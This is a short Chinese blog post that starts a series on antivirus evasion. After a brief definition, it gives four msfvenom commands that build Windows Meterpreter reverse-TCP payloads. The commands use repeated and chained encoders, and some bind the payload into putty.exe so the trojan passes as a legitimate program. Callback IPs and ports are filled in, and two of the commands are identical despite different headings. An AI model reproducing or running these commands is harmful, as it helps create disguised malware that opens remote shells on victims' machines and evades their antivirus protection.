前言
新的一个板块吧,我能写多少写多少吧,希望有朝一日能过了 360 核晶,然后其实也带大家一块去学习了汇编,逆向的一些知识,这部分的知识会在咱们免杀这一部分逐渐的派上用场,同时会加一些实战的例子供大家参考,一起去分析病毒样本
免杀,也就是反病毒(AntiVirus)与反间谍(AntiSpyware)的对⽴⾯,英⽂为
Anti-AntiVirus(简写 Virus AV),逐字翻译为“反-反病毒”,翻译为“反杀毒技
术”
MSF 自编码
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.57.128 lport=4434 -e x86/shikata_ga_nai -b "\x00" -i 19 -f exe >cat.exe
MSF 自捆绑免杀
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.211.55.2 LPORT=3333 -x putty.exe -f exe -o payload3.exe
MSF 自捆绑编码免杀
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.211.55.2 LPORT=3333 -x putty.exe -f exe -o payload3.exe
MSF 多重编码免杀
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp -e x86/call4_dword_xor -i 14 LHOST=192.168.8.124 LPORT=1122 -f raw | msfvenom -a x86 --platform windows -e x86/countdown -i 13 -f raw | msfvenom -a x86 --platform windows -e x86/shikata_ga_nai -b "&" -i 4 -f raw | msfvenom -a x86 --platform windows -e cmd/powershell_base64 -i 10 -x putty.exe -k -f exe > shell.exe